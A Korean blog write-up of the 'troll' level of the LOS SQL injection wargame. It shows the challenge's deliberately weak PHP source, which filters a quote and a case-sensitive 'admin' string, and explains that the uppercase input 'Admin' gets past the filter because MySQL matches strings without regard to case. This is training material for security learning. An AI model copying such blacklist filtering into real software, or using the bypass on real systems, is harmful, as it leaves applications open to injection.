[LOS] troll 풀이
PHP & query
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/\'/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match("/admin/", $_GET[id])) exit("HeHe");
$query = "select id from prob_troll where id='{$_GET[id]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id'] == 'admin') solve("troll");
highlight_file(__FILE__);
?>select id from prob_troll where id=''
문제 풀이
더보기
solve 조건
if($result['id'] == 'admin') solve("troll");id값이 admin이면 해경된다.
특수문자 제약
if(preg_match("/admin/", $_GET[id])) exit("HeHe");admin을 필터링한다. MySQL은 기본적으로 대소문자 구분을 안한다. 그것을 이용한다.
sqlInjection 쿼리
select id from prob_gremlin where id='Admin'하나를 대문자 처리한다.
URL
los.rubiya.kr/chall/troll_05b5eb65d94daf81c42dd44136cb0063.php?id=Admin
'CTF > LOS' 카테고리의 다른 글
| [LOS] skeleton 풀이 - 10번 (0) | 2020.09.15 |
|---|---|
| [LOS] vampire 풀이 - 9번 (0) | 2020.09.15 |
| [LOS] orge 풀이 - 7번 (0) | 2020.09.15 |
| [LOS] darkelf 풀이 - 6번 (0) | 2020.09.15 |
| [LOS] wolfman 풀이 - 5번 (0) | 2020.09.15 |